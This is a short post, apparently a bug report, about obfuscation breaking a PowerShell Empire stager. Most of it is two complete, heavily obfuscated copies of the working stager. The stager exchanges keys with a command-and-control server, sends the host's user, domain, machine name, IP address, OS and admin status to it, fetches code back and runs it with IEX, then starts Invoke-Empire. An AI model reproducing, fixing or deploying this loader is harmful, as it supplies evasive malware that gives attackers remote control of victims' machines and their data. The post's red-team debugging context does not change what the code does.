When obfuscating the Empire stager, it no longer executes properly. I am able to correct this by disabling string TOKEN, member TOKEN levels 3 and 4, and command TOKEN obfuscation types. My hunch is that it all traces back to something in string TOKEN obfuscation.
.("{0}{2}{1}" -f 'SE','iTeM','t-') ("VARiaBL"+"e:0F"+"4G"+"v5") ([tyPE]("{3}{2}{1}{0}{4}"-F '.aS','cTiOn','Fle','Re','semBly') ) ; .("{0}{2}{1}" -f 'S','ITeM','eT-') ("vARia"+"B"+"Le:"+"UR2H"+"cI") ( [typE]("{5}{0}{3}{1}{4}{2}"-f 'E','O','ng','NC','DI','SysTEm.tExt.')) ; $01aW = [tYPE]("{0}{9}{10}{7}{8}{3}{4}{6}{1}{5}{2}"-f'SYsT','O','Rflags','A','p','VidE','HY.cspPr','Y.Cr','YpTOGr','em.se','curiT'); .("{2}{1}{0}" -f 'M','ITe','sEt-') ("vaRIAbl"+"e:9"+"d"+"2o"+"4") ([TYpe]("{1}{2}{0}{4}{3}" -f'br','SYstem.NE','T.WE','Uest','EQ') ) ; &('sv') ("{1}{0}" -f'jg0','H') ([tYPe]("{3}{7}{5}{0}{2}{6}{1}{4}" -F'.','NTIaLca','N','sy','CHe','TEm','et.CREde','S') ); &('SV') ('l3vo'+'jy') ([type]("{2}{0}{1}"-F'rOnm','enT','enVI') ); .("{0}{1}"-f 'Set-IT','Em') ("VARi"+"abl"+"E:15Ju"+"0h") ( [TypE]("{5}{2}{4}{7}{1}{8}{0}{3}{6}" -F'oW','p','u','sIDE','r','SEc','Ntity','ity.PRinci','Al.wind') ) ; &("{1}{0}{3}{2}"-f '-vA','sEt','e','RIAbL') ('Aopkq'+'U') ( [tYpE]("{2}{0}{3}{4}{1}"-F'STEM.DIAGNo','ESs','sY','StICS.p','RoC') ); &('sV') ('dM0o'+'8J') ( [tYpe]("{0}{2}{1}"-F'biT','nveRtER','co') ) ; $t9j5= [tYPe]('GC') ; fUnCtiON START`-`NeGO`Ti`Ate {pArAm(${S},${Sk},${uA}=("{3}{2}{6}{11}{1}{9}{7}{8}{10}{0}{5}{12}{4}"-f'; ','nDows NT ','oZIlLA/','M',' GeCKo','r','5.','1; W','OW64; TrI','6.','DENt/7.0','0 (WI','V:11.0) LiKe'))fUNctiON C`oN`Ve`RtTo-rC`4B`ytEs`TrEAm {PaRaM (${R`CK}, ${i`N})begIN {[BytE[]] ${s} = 0..255;${J} = 0;0..255 | .("{0}{1}{3}{2}"-f'FoRE','aCH','ct','-OBje') {${J} = (${j} + ${s}[${_}] + ${R`cK}[${_} % ${R`CK}."l`eNg`TH"]) % 256;${S}[${_}], ${s}[${J}] = ${S}[${J}], ${S}[${_}];};${i} = ${j} = 0;}pROcEsS {FOREACh(${bY`Te} in ${in}) {${I} = (${i} + 1) % 256;${J} = (${j} + ${s}[${i}]) % 256;${s}[${I}], ${S}[${J}] = ${s}[${J}], ${s}[${i}];${by`Te} -Bxor ${S}[(${s}[${i}] + ${s}[${J}]) % 256];}}}fUnCtIOn decr`Ypt-b`Y`Tes {PaRam (${K`ey}, ${In})if(${I`N}."leNG`Th" -Gt 32) {${H`Mac} = &("{2}{1}{0}"-f 't','-ObjeC','New') ("{0}{7}{5}{4}{8}{2}{1}{3}{6}" -f'Sy','S','PHy.HMAC','H','RypTOG','C','A256','StEm.SEcurITY.','ra');${E}= ( &("{0}{1}"-f'G','ci') ('vAriabLe:'+'Ur'+'2'+'hci') )."v`AluE"::"As`cii";${m`Ac} = ${I`N}[-10..-1];${i`N} = ${In}[0..(${IN}."len`GTh" - 11)];${h`MAC}."K`ey" = ${E}.("{1}{0}"-f's','GEtBYtE').Invoke(${K`ey});${eX`pEc`TeD} = ${Hm`AC}.("{2}{0}{1}" -f 'MPUTE','HAsH','CO').Invoke(${iN})[0..9];if (@(.("{3}{0}{2}{1}"-f'Pa','T','Re-OBJEc','COm') ${m`AC} ${Exp`e`CtEd} -SYNC 0)."LEn`g`TH" -ne 0) {rEturN;}${i`V} = ${In}[0..15];${A`ES} = .("{0}{1}{2}" -f 'NEw-Ob','Je','CT') ("{8}{10}{11}{0}{6}{2}{14}{5}{1}{13}{4}{7}{9}{12}{3}"-f'I','y','y','vIDEr','RapHy.AESCrypT','R','t','O','SYsT','SerVIC','eM','.SEcUr','EPrO','ptog','.C');${A`eS}."m`odE" = "CBC";${A`eS}."k`eY" = ${e}.("{0}{2}{1}"-f 'Get','es','ByT').Invoke(${K`ey});${A`Es}."Iv" = ${I`V};(${A`ES}.("{1}{0}{2}{3}" -f 'EATe','Cr','DEcRYP','TOR').Invoke())."tR`AN`SFOrmfInalbl`O`cK"((${iN}[16..${i`N}."lE`NGTH"]), 0, ${in}."le`NgTH"-16)}}${Nu`lL} = $0F4Gv5::("{3}{2}{4}{1}{0}{5}"-f'Na','tial','thP','LoadWi','ar','me').Invoke(("{0}{1}{2}"-f 'S','ystem.Secur','ity'));${nU`LL} = ( &("{2}{0}{3}{1}" -f 'ARIAb','e','get-v','L') ('0f4GV'+'5') -VAluEO )::("{1}{4}{0}{3}{2}" -f'a','LoadWit','alName','rti','hP').Invoke(("{2}{1}{3}{0}"-f'ore','stem','Sy','.C'));${erroRAcTi`O`NPr`efER`EncE} = ("{1}{3}{0}{2}{4}"-f 'C','Si','ont','lently','inue');${E}= ( .("{1}{0}" -f'EM','it') ("VarIa"+"b"+"LE:"+"uR2h"+"Ci") )."V`ALUE"::"aSc`iI";${c`U`sToM`HE`AdErS} = "";${S`kb}=${e}.("{0}{1}" -f'G','etBYTeS').Invoke(${S`k});${A`ES}=&("{0}{1}{3}{2}"-f'N','eW-','EcT','OBj') ("{0}{6}{9}{10}{2}{1}{5}{4}{7}{8}{3}" -f 'S','Pto','ry','R','Ovi','SErvICEPR','YSTEm.SeCuRI','D','e','ty.CryPtogRAp','Hy.AeSC');${I`V} = [Byte] 0..255 | .("{2}{1}{0}" -f'om','AnD','GeT-R') -COunT 16;${A`ES}."Mo`De"="CBC";${A`Es}."K`eY"=${S`kB};${A`es}."I`V" = ${i`V};${hM`AC} = &("{2}{1}{0}" -f 'JeCt','B','New-O') ("{1}{6}{9}{2}{8}{3}{0}{4}{10}{5}{7}{11}"-f'Ty.CR','S','.Se','uRi','Yptogr','y.HMA','yS','CSH','C','tEM','aph','A256');${HM`Ac}."k`ey" = ${S`KB};${c`Sp} = &("{0}{1}{2}{3}"-f 'NE','w','-Obje','ct') ("{2}{0}{5}{4}{1}{3}{6}" -f 'sTEm.S','CSPPARame','Sy','tEr','APhY.','ECUrity.CRyPTOgr','s');${C`sp}."fLa`gs" = ${C`SP}."FL`Ags" -Bor (.("{2}{0}{1}"-f 'iABl','E','VAR') ("{0}{1}"-f '0','1AW') )."v`ALUe"::"USE`maC`Hi`N`EKEYsTORe";${Rs} = .("{2}{0}{1}"-f 'W-O','BjeCT','Ne') ("{15}{9}{14}{10}{7}{6}{8}{12}{5}{3}{11}{0}{4}{1}{13}{2}"-f'O','OViD','r','RY','SERVIcEPR','Y.RSAC','RiTY','u','.CryP','Em.','C','pT','TOgrAPh','e','SE','SYsT') -ARGuMeNtLISt 2048,${C`sp};${R`K}=${r`S}.("{1}{0}{3}{2}"-f 'Tri','TOXmLS','g','n').Invoke(${fa`lsE});${I`D}=-join(("{0}{5}{8}{7}{3}{9}{1}{2}{4}{6}"-f 'AB','12','3456','ST','7','CD','89','NPR','EFGHKLM','UVWXYZ').("{0}{2}{3}{1}"-f'T','rray','oC','harA').Invoke()|.("{0}{2}{1}" -f 'Get-Ran','m','do') -Count 8);${i`B}=${E}.("{1}{2}{0}"-f'S','GET','byTe').Invoke(${r`k});${e`B}=${i`V}+${a`ES}.("{1}{0}{2}{3}"-f'eATEENcRy','Cr','Pt','OR').Invoke().("{4}{3}{1}{5}{0}{2}" -f'OC','rMFInALB','K','ANsFo','TR','l').Invoke(${i`B},0,${i`B}."LENG`TH");${eb}=${e`B}+${hM`Ac}.("{2}{0}{3}{1}"-f'MP','H','CO','UTeHAS').Invoke(${e`B})[0..9];If(-Not ${WC}) {${w`C}=&("{1}{2}{0}"-f'cT','Ne','W-ObJE') ("{2}{1}{0}{3}" -f'.Ne','Em','SysT','t.WEbCLienT');${w`c}."PrO`xy" = ( .("{1}{0}" -f'r','Di') ("VariAbL"+"E:9"+"D"+"2o"+"4"))."V`ALUE"::("{1}{2}{3}{0}{4}" -f 'WEBPR','GE','TSYSTE','m','OXY').Invoke();${w`c}."prO`Xy"."cr`e`DENTi`ALS" = ( &("{1}{0}" -f 'cI','g') ("{1}{0}{3}{2}" -f 'aRiAbL','v','Hjg0','E:') )."V`AluE"::"D`efa`ul`TCREDeNtiA`ls";}if (${Cu`StoM`Head`eRS} -ne "") {${hE`AdErS} = ${cu`St`OMHeA`DERS} -split ',';${hE`Ad`erS} | &("{2}{4}{3}{1}{0}"-f 't','bjEC','FOREaC','-O','h') {${hE`A`DERKeY} = ${_}.("{1}{0}" -f 'pLIT','S').Invoke(':')[0];${h`EaDErva`lUE} = ${_}.("{1}{0}"-f 't','splI').Invoke(':')[1];${W`C}."H`EADE`RS".("{1}{0}"-f 'd','AD').Invoke(${h`eAdeR`kEY}, ${hE`ADERVA`L`ue});}}${w`c}."HE`ADeRS".("{1}{0}" -f 'dd','A').Invoke(("{2}{1}{0}"-f 'nt','ge','User-A'),${uA});${iv}= (&("{0}{1}"-f'GC','I') ('VaRI'+'ABle'+':Dm0o'+'8j'))."vaL`Ue"::("{1}{2}{0}" -f 'ES','GetBY','T').Invoke($(&("{0}{1}{2}"-f'GEt-','R','aNdom')));${DA`Ta} = ${E}.("{2}{1}{0}" -f 's','etBytE','g').Invoke(${I`d}) + @(0x01,0x02,0X00,0x00) + $dm0O8J::("{1}{2}{0}"-f 's','GeT','BYtE').Invoke(${EB}."LEnG`TH");${R`c4P} = .("{1}{3}{0}{4}{2}"-f'ytES','CoNVERtTo-R','M','C4B','trEa') -RCK $(${Iv}+${s`kb}) -IN ${da`TA};${R`c4p} = ${iV} + ${rC`4p} + ${eb};${R`AW}=${wc}.("{1}{0}{2}" -f 'loadDat','Up','a').Invoke(${s}+("{2}{1}{0}{3}"-f't','admin/ge','/','.php'),("{0}{1}" -f'P','OST'),${rC`4p});${DE}=${e}.("{0}{2}{1}" -f 'GEt','inG','STR').Invoke(${r`S}.("{0}{1}" -f'D','EcrypT').Invoke(${r`AW},${F`AlSE}));${n`O`NCE}=${d`E}[0..15] -JoiN '';${k`EY}=${D`E}[16..${DE}."LeNg`TH"] -jOin '';${nOn`cE}=[StRiNg]([lonG]${N`O`NcE} + 1);${A`ES}=&("{1}{0}{2}" -f'EW-O','N','BJECt') ("{11}{0}{6}{8}{3}{4}{5}{2}{7}{9}{10}{1}" -f 'Tem','oVIDeR','Ser','Ity.CryPtOgraPHy.AeS','C','ryptO','.','v','SEcur','i','CEPr','SYS');${IV} = [ByTE] 0..255 | .("{0}{2}{1}" -f 'GeT-RA','dOM','N') -CoUNt 16;${a`es}."mO`De"="CBC";${A`ES}."k`ey"=${E}.("{2}{0}{1}" -f 'Byte','s','GET').Invoke(${K`Ey});${A`es}."iv" = ${IV};${I}=${nOn`cE}+'|'+${s}+'|'+ $l3VojY::"U`SERD`omAi`NNaMe"+'|'+ $L3vOjy::"UsER`NaME"+'|'+ (.("{0}{2}{1}"-f 'VARIab','e','l') ("{1}{0}{2}" -f'v','l3','oJY') -VaL )::"m`ACHiNenA`me";${P}=(&("{1}{0}"-f'mI','gw') ("{9}{2}{7}{0}{6}{5}{1}{8}{3}{4}"-f'or','g','N','rATI','On','OnfI','KAdapteRC','32_Netw','u','WI')|&("{1}{0}" -f'HEre','W'){${_}."IPA`Ddr`Ess"}|&("{1}{0}{2}"-f'e','S','lect') -EXpand ("{0}{2}{1}"-f 'IPAd','REss','D'));${I`p} = @{${Tr`uE}=${p}[0];${F`AlsE}=${p}}[${p}."l`ength" -lT 6];if(!${I`p} -or ${I`P}.("{1}{0}"-f 'iM','tR').Invoke() -Eq '') {${I`p}=("{0}{1}" -f '0.0.0','.0')};${I}+="|$ip";${i}+='|'+(.("{1}{3}{0}{2}" -f'bjE','GeT-WM','cT','iO') ("{5}{4}{0}{3}{1}{2}"-f 'Ng','y','sTEm','S','ATi','Win32_OpEr'))."na`ME".("{0}{1}" -f'S','pLIt').Invoke('|')[0];if(( $l3vojy::"USe`Rn`AME").("{1}{0}" -f 'r','ToLowe').Invoke() -eq ("{2}{0}{1}" -f 'y','stem','s')){${i}+=(('n48True') -CRepLACe ([CHAR]110+[CHAR]52+[CHAR]56),[CHAR]124)}else {${I} += '|' +([Security.Principal.WindowsPrincipal] $15JU0H::("{1}{2}{3}{0}"-f'rrent','Get','C','u').Invoke())."isiNr`o`le"([Security.Principal.WindowsBuiltInRole] ("{3}{1}{0}{2}"-f 'nistrat','dmi','or','A'))}${N}= $AoPkqu::("{3}{0}{1}{2}"-f'U','RRENtPrOce','sS','GeTC').Invoke();${I}+='|'+${n}."PROC`e`Ssn`Ame"+'|'+${n}."Id";${I} += (("{4}{2}{0}{1}{3}"-f'h','e','owers','llJxY','JxYp'))."r`EpL`ACE"(([ChAr]74+[ChAr]120+[ChAr]89),[StRIng][ChAr]124) + ${P`s`VER`SionTAbLe}."Psver`s`ION"."M`AjoR";${I`B2}=${e}.("{2}{1}{0}"-f's','ETByTE','g').Invoke(${I});${e`B2}=${i`V}+${a`es}.("{0}{2}{3}{4}{1}"-f'Creat','pTor','eENC','R','y').Invoke().("{0}{3}{4}{1}{2}"-f'T','A','LBLoCK','RA','NsformFIn').Invoke(${I`B2},0,${i`B2}."Le`Ngth");${H`maC}."k`Ey" = ${E}.("{1}{2}{0}" -f'S','GeTByt','e').Invoke(${K`ey});${E`B2} = ${E`B2}+${h`MAC}.("{1}{0}{2}{3}" -f 'p','COm','UTEHA','SH').Invoke(${e`B2})[0..9];${I`V2}= ( &('gi') ("{3}{2}{0}{4}{1}"-f 'Le','8j','B','vAria',':dm0o') )."vA`LUe"::("{1}{0}{2}" -f 'TBYtE','GE','S').Invoke($(.("{3}{2}{0}{1}" -f'Do','m','N','GET-RA')));${Da`T`A2} = ${E}.("{0}{1}" -f'GeTbyt','ES').Invoke(${I`D}) + @(0x01,0x03,0x00,0x00) + ( &("{1}{0}"-f 'Le','VarIAB') ('dm0o'+'8J') )."va`luE"::("{0}{2}{1}"-f 'GeTBy','eS','T').Invoke(${E`B2}."lEn`G`TH");${R`c4P2} = .("{4}{1}{2}{3}{6}{0}{5}" -f '-RC4BYTESt','o','nvER','T','C','reaM','To') -RCK $(${i`V2}+${S`kb}) -IN ${d`A`TA2};${R`c4`P2} = ${i`V2} + ${R`c4p2} + ${E`B2};if (${Cus`TomHe`Aders} -ne "") {${he`ADeRs} = ${C`UsT`Om`HEAdERS} -SplIT ',';${H`eAde`RS} | &("{1}{4}{2}{0}{3}"-f 'J','FOr','-OB','ECT','EACh') {${he`Ad`eRkeY} = ${_}.("{1}{0}"-f 'LIT','SP').Invoke(':')[0];${H`EaDer`ValUe} = ${_}.("{0}{1}" -f 's','PLit').Invoke(':')[1];${wC}."hEa`deRs".("{1}{0}" -f'd','Ad').Invoke(${hEADer`K`ey}, ${hEADe`RV`ALue});}}${wC}."HE`ADe`Rs".("{0}{1}" -f 'Ad','d').Invoke(("{2}{0}{1}"-f'gen','t','User-A'),${u`A});${R`Aw}=${W`c}.("{1}{0}{2}{3}" -f'lo','Up','adD','ata').Invoke(${S}+("{1}{0}"-f'news.php','/'),("{0}{1}" -f 'PO','ST'),${r`C`4p2});.("{1}{0}"-f 'X','IE') $( ${e}.("{3}{1}{0}{2}"-f 'Str','ET','Ing','G').Invoke($(.("{2}{3}{1}{0}" -f'Es','T','DEcRY','pT-BY') -KEY ${k`Ey} -In ${R`AW})) );${a`ES}=${N`uLl};${s2}=${NU`Ll};${W`C}=${Nu`lL};${e`B2}=${n`Ull};${R`Aw}=${nU`Ll};${Iv}=${NU`lL};${W`c}=${NU`lL};${I}=${n`ull};${i`B2}=${Nu`LL}; (&("{0}{1}" -f'd','Ir') ('va'+'RIAB'+'Le:t9'+'J'+'5'))."VA`LUE"::("{1}{0}" -f 'olLEcT','C').Invoke();&("{1}{2}{3}{0}" -f'e','Invoke-E','m','pir') -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${sK} -SessionKey ${K`Ey} -SessionID ${iD};}&("{4}{1}{3}{0}{2}" -f'go','art','tiate','-Ne','St') -s "$ser" -SK ("{0}{8}{2}{1}{7}{6}{3}{4}{5}" -f'3c6e0b8a9c15','a','28b9','15','3','1d','ca','98','224a82') -UA ${u};
set-ItEM ('v'+'arIab'+'le:9ernQ'+'0') ( [TYpe]("{1}{5}{3}{0}{2}{6}{4}" -F'ctI','R','ON.Asse','FlE','ly','E','Mb')) ; seT-vArIaBle ("{0}{1}"-f'j','N4Ba') ([tyPE]("{3}{1}{0}{2}" -F'ExT.eNcODI','eM.t','Ng','SYSt') ) ; SET ("{1}{0}" -f 'Z','O8Lb') ( [tYPE]("{3}{8}{4}{7}{6}{0}{2}{1}{9}{5}" -F 'oGR','y.CSPPr','apH','SYsTEm.se','Y.','S','RypT','c','CUriT','ovIdeRFlAG') ) ;sEt-vARiablE ("{0}{1}" -f'3E1','S') ( [tyPe]("{0}{1}{3}{2}{4}" -f 'SyStEM.N','ET','web','.','REqueST') ) ; ${9`Px} = [typE]("{3}{1}{0}{4}{2}"-f're','TEM.nET.c','EnTiALcaCHE','sys','d') ; sET-VariabLe ("{0}{1}"-f '2','kU9AV') ( [TyPE]("{1}{2}{0}" -F 'nMeNT','EN','vIRo')) ; SEt-ITeM ("{2}{0}{1}" -f'iaBLE:52F','6Z4','VaR') ( [tYpE]("{8}{9}{1}{3}{0}{4}{5}{10}{7}{2}{6}"-f 'W','.','Tit','PrInCipal.','INdoW','si','Y','N','seCuR','Ity','De') ) ; sET-iTEM ('va'+'rI'+'ABle:R'+'SJ') ( [tYpE]("{0}{2}{4}{3}{1}{6}{5}"-f's','DIaGNo','ys','.','tEM','CESs','StiCs.pRO') ) ; set-iTeM ("vARiablE"+":H4"+"Y"+"sF") ( [type]("{0}{3}{2}{1}" -F'BI','ER','t','TCONveR') ) ; Sv ("{0}{1}"-f 'JC0','A') ( [tYpe]('gc') ) ;fUNcTiON sTarT`-`Ne`Go`TIATE {parAm(${s},${S`k},${U`A}='MoZilLA/5.0 (WIndOWS NT 6.1; WOW64; TrIDeNt/7.0; rv:11.0) LiKe GEcKo')FUnCTiON convE`Rtt`O-`Rc4b`yT`EsTre`AM {PaRaM (${r`cK}, ${IN})BegIn {[BYTe[]] ${S} = 0..255;${j} = 0;0..255 | FOREAcH-OBjecT {${J} = (${j} + ${s}[${_}] + ${r`cK}[${_} % ${r`Ck}."LeN`g`TH"]) % 256;${s}[${_}], ${S}[${J}] = ${S}[${J}], ${s}[${_}];};${I} = ${j} = 0;}pRocEsS {ForEacH(${BY`Te} in ${I`N}) {${i} = (${I} + 1) % 256;${J} = (${j} + ${S}[${i}]) % 256;${s}[${i}], ${S}[${j}] = ${s}[${J}], ${S}[${i}];${By`Te} -BXOR ${S}[(${S}[${i}] + ${S}[${j}]) % 256];}}}FunctIoN dEcryp`T-`BytES {Param (${K`ey}, ${IN})IF(${i`N}."LENG`TH" -Gt 32) {${hM`AC} = NEw-ObJect ("{3}{10}{4}{0}{8}{1}{2}{9}{5}{7}{11}{6}" -f'eC','Rity.CryptoGRAP','h','Sy','em.S','.HM','6','A','U','Y','ST','CSHA25');${E}= ( GeT-VARIAblE ("{0}{1}"-f'jn','4Ba') )."Va`lUe"::"as`CiI";${m`Ac} = ${I`N}[-10..-1];${I`N} = ${I`N}[0..(${IN}."LeNg`Th" - 11)];${hm`Ac}."K`EY" = ${e}."g`e`TbYtES"(${k`EY});${exPec`T`eD} = ${HM`Ac}."cOMPu`T`EHASh"(${i`N})[0..9];IF (@(COMpARe-ObJect ${m`Ac} ${E`XPE`cTED} -SYnc 0)."lE`Ngth" -nE 0) {rETURN;}${I`V} = ${In}[0..15];${a`es} = NeW-OBJect ("{6}{10}{12}{5}{2}{11}{1}{9}{7}{8}{0}{4}{3}"-f'E','.AEsC','Ty.CrYP','iDEr','ProV','Ri','SYs','OSErV','IC','RYPT','tEm','toGRApHy','.SEcu');${a`Es}."m`oDe" = "CBC";${A`ES}."K`eY" = ${E}."gEt`B`YTeS"(${K`EY});${a`es}."I`V" = ${I`V};(${a`Es}."creat`e`DE`CRYpTOR"())."traNsFor`mF`InALBL`OCK"((${IN}[16..${in}."LEN`G`Th"]), 0, ${i`N}."LEng`Th"-16)}}${n`ULl} = ( gEt-item ("{2}{0}{3}{1}" -f 'BLe','Ernq0','varIA',':9'))."Val`ue"::"l`oaDWithPa`R`TIaLn`A`mE"("System.Security");${n`uLl} = ${9eR`N`Q0}::"Lo`A`dwItHp`A`RtiAlN`AMe"("System.Core");${ERroraC`Ti`o`NPr`e`FErENce} = "SilentlyContinue";${E}= ( varIable ("{0}{1}" -f 'JN4b','A') )."V`AluE"::"a`sCIi";${cu`STOm`H`eA`DERs} = "";${S`kb}=${e}."GE`TBY`TES"(${S`k});${a`ES}=NEw-ObjECT ("{4}{12}{15}{10}{7}{1}{8}{13}{11}{6}{3}{9}{2}{14}{0}{5}"-f 'd','r','ceP','V','Sy','er','ToSer','Y.C','Yptography.AEs','i','cURIT','p','st','Cry','ROvi','em.Se');${I`V} = [byTE] 0..255 | Get-RANDOM -cOUnt 16;${A`ES}."m`ODe"="CBC";${a`ES}."K`Ey"=${s`Kb};${a`eS}."iV" = ${Iv};${hM`Ac} = New-ObJECT ("{3}{2}{5}{7}{0}{6}{4}{1}"-f 'pT','CSHA256','YS','S','Aphy.HMA','tEm.S','OGR','ecurITY.CrY');${hM`AC}."K`Ey" = ${s`kb};${c`sP} = NEW-OBjECt ("{1}{7}{3}{0}{2}{5}{6}{4}{8}"-f'TY.Cr','Sy','Y','em.SeCuRI','Csp','p','toGRAphy.','st','ParamEtErs');${c`SP}."f`LaGs" = ${C`SP}."f`lagS" -BOR (gET-vAriable ("{0}{1}" -f'o8','Lbz') )."VA`LuE"::"u`SEma`ChIne`KEys`T`OrE";${rs} = NeW-OBjECT ("{13}{10}{7}{8}{3}{11}{6}{5}{14}{4}{0}{12}{1}{2}{9}"-f 'yPTOSErvi','Ovi','de','C','ACR','p','Y','C','URITY.','r','M.SE','r','cEPR','SYsTe','TogRAPHY.RS') -ARGUMentLIST 2048,${c`sP};${R`k}=${Rs}."T`o`xmLstrINg"(${fAL`SE});${i`D}=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789"."tOC`h`ARaRR`AY"()|Get-Random -Count 8);${I`B}=${E}."Ge`Tby`Tes"(${rK});${e`B}=${I`V}+${a`ES}."C`ReAtee`NCrYP`ToR"()."TRansFoR`Mfi`Na`lbLo`CK"(${Ib},0,${iB}."leNG`Th");${EB}=${e`B}+${H`mAc}."cOMpU`TEHa`sH"(${E`B})[0..9];if(-NoT ${WC}) {${Wc}=NeW-OBjeCt ("{4}{1}{2}{3}{0}"-f 'iEnt','YSTEM.N','Et.W','ebCl','S');${W`c}."P`ROxy" = (GEt-VaRIABLe ("{0}{1}" -f'3E1','s') -vAlu )::"Ge`TsysTEMWE`B`p`RO`XY"();${W`c}."pr`OXy"."cRED`enT`IALS" = ${9`Px}::"DeF`Au`ltCrE`DEN`TiaLs";}if (${C`u`Stom`heAders} -ne "") {${HE`A`dErs} = ${c`u`sT`OMHea`DErS} -SpLIt ',';${he`A`DERs} | FOREACH-OBjEcT {${HeA`DeR`KeY} = ${_}."s`PlIT"(':')[0];${he`Ad`eRvAl`ue} = ${_}."sPL`It"(':')[1];${wC}."HEA`d`eRS"."A`DD"(${hEAdEr`k`ey}, ${h`eADerv`ALUE});}}${WC}."He`ADErs"."A`dD"("User-Agent",${U`A});${Iv}= (gcI ("Va"+"Ri"+"aBLE:h4ys"+"F") )."vAl`UE"::"g`eTbyt`eS"($(GeT-RandOm));${d`Ata} = ${e}."gEtBY`TeS"(${i`d}) + @(0X01,0x02,0X00,0X00) + ( GeT-vARIAbLE ("{0}{1}" -f'H4y','sF') )."VAl`Ue"::"G`ETbYT`Es"(${EB}."L`ENgtH");${Rc`4P} = CONVertTO-RC4BYTeStrEam -RCK $(${IV}+${S`Kb}) -IN ${da`TA};${Rc`4P} = ${iv} + ${RC`4P} + ${E`B};${r`AW}=${wc}."UPLO`AddA`Ta"(${S}+"/news.php","POST",${RC`4P});${D`e}=${e}."gETsTR`ing"(${R`S}."DeCR`Ypt"(${r`AW},${fA`L`Se}));${nO`NCe}=${DE}[0..15] -JOiN '';${k`EY}=${D`E}[16..${dE}."lEn`G`Th"] -JoIn '';${NON`CE}=[String]([LONG]${n`o`NCe} + 1);${a`Es}=NEw-ObjeCt ("{9}{0}{3}{2}{10}{4}{5}{6}{8}{1}{7}"-f'T','ovID','cuRI','EM.SE','rApHy','.A','EsCrypToSERvIce','eR','PR','SYS','TY.CRypTog');${I`V} = [BYtE] 0..255 | Get-RANdOM -COuNT 16;${a`es}."Mo`De"="CBC";${a`es}."K`ey"=${E}."G`etbyTEs"(${k`Ey});${a`es}."iv" = ${i`V};${i}=${NO`N`cE}+'|'+${S}+'|'+ ( Dir ("{2}{3}{0}{1}"-f'iABlE:2KU9','av','va','R') )."v`ALue"::"usERdo`maI`N`NaMe"+'|'+ ( GCI ('vArIABL'+'E:2'+'k'+'U9aV') )."v`ALUe"::"US`Ern`AMe"+'|'+ ( VARiAbLe ("{0}{1}"-f'2','ku9aV') )."vA`lUE"::"MAch`iNen`A`ME";${p}=(gwMi ("{2}{5}{4}{6}{0}{1}{3}{7}"-f 'ra','Ti','WIN32_NeTWO','o','f','RKAdapTERCon','IGu','N')|WHeRE{${_}."I`padDRe`Ss"}|SeLECT -ExPAnD ("{1}{2}{0}"-f 'S','IPADD','ReS'));${I`P} = @{${t`RUe}=${p}[0];${f`AlSE}=${P}}[${p}."LEng`TH" -Lt 6];iF(!${i`P} -or ${I`P}."t`Rim"() -Eq '') {${I`p}='0.0.0.0'};${i}+="|$ip";${i}+='|'+(GeT-WMIObjECT ("{3}{1}{0}{2}{4}" -f's','RATInGSy','te','WiN32_Ope','m'))."n`Ame"."SpL`it"('|')[0];if(( ( gET-vaRiAbLE ("{0}{1}" -f '2ku9','AV') -VALUEOnLy)::"uSE`RNA`Me")."t`O`LoweR"() -eq "system"){${I}+="|True"}else {${I} += '|' +([Security.Principal.WindowsPrincipal] ( GCI ("{4}{1}{0}{2}{3}" -f 'aBlE:5','i','2','F6Z4','vAr') )."va`lUe"::"GeTcUR`R`ENT"())."isiNr`O`le"([Security.Principal.WindowsBuiltInRole] "Administrator")}${N}= ${r`Sj}::"geT`c`uRren`Tp`ROCEsS"();${i}+='|'+${n}."PROCES`SnA`ME"+'|'+${n}."iD";${I} += "|powershell|" + ${PS`Ve`RsiOn`T`AbLE}."ps`Ve`RsIoN"."MaJ`OR";${I`B2}=${e}."ge`TBYt`es"(${I});${e`B2}=${I`V}+${A`es}."crE`AT`e`EnCrY`Ptor"()."T`R`AnSformFiNA`Lb`LOCK"(${i`B2},0,${i`B2}."L`eNgth");${hm`Ac}."k`ey" = ${E}."G`E`TByTes"(${k`EY});${E`B2} = ${E`B2}+${hM`Ac}."cOmpUT`E`HaSh"(${E`B2})[0..9];${I`V2}= ${h`4y`sF}::"G`etBYt`eS"($(Get-RaNDOM));${D`Ata2} = ${e}."GE`Tbyt`eS"(${i`d}) + @(0x01,0X03,0x00,0x00) + ( GET-vArIabLe ('H4y'+'SF') -Valueo )::"gE`T`ByTes"(${E`B2}."LE`N`GTh");${r`c4P2} = CoNvERTTO-RC4BYTEStrEam -RCK $(${I`V2}+${S`Kb}) -IN ${D`At`A2};${Rc`4p2} = ${I`V2} + ${r`C4`p2} + ${e`B2};if (${cU`sT`o`MheA`DErs} -ne "") {${Hea`DE`RS} = ${CUsto`mh`EAdERS} -SpLIT ',';${hea`derS} | ForEAcH-ObJECT {${HeA`Derk`EY} = ${_}."S`PLIt"(':')[0];${HeA`d`eRv`ALUE} = ${_}."s`Plit"(':')[1];${Wc}."HeaDE`RS"."A`dd"(${h`ea`d`eRKEY}, ${h`e`AD`eRVAlUe});}}${wC}."hE`A`derS"."a`Dd"("User-Agent",${U`A});${R`AW}=${W`C}."U`PL`oAddA`TA"(${s}+"/login/process.php","POST",${R`C4P2});IEX $( ${E}."gET`StrI`NG"($(DECRYpT-BYTes -KEy ${k`Ey} -In ${R`AW})) );${a`es}=${Nu`LL};${s2}=${N`ULL};${WC}=${N`ull};${E`B2}=${NU`ll};${R`AW}=${N`uLl};${iv}=${nu`LL};${W`c}=${n`ull};${i}=${nU`ll};${i`B2}=${N`Ull}; ( geT-vaRIaBLe ("{1}{0}"-f 'c0A','j'))."VAL`ue"::"cO`Ll`eCt"();Invoke-Empire -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${SK} -SessionKey ${K`Ey} -SessionID ${i`D};}Start-Negotiate -s "$ser" -SK '3c6e0b8a9c15224a8228b9a98ca1531d' -UA ${U};
I'll be doing some more research into this and see if I can get you some more output when the obfuscated script is actually executing. I thought I would go ahead and post to see if you are able to spot anything that stands out to you.